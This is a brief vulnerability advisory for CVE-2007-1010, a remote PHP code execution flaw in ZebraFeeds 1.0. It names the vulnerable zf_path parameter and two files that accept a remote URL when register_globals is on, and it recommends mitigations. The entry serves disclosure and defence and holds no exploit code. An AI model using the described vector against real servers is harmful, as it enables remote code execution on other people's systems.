CVE-2007-1010

Name of the Vulnerable Software and Affected Versions: ZebraFeeds version 1.0

Description: The issue allows remote attackers to execute arbitrary PHP code when register globals is enabled. This is achieved by providing a URL in the zf path parameter to specific API endpoints, such as "aggregator.php" and "controller.php" in the "newsfeeds/includes/" directory.

Recommendations: For ZebraFeeds version 1.0, consider disabling the register globals setting to prevent exploitation. Additionally, restrict access to the "aggregator.php" and "controller.php" files in the "newsfeeds/includes/" directory until a fix is available. Avoid using the zf path parameter in the affected API endpoints until the issue is resolved.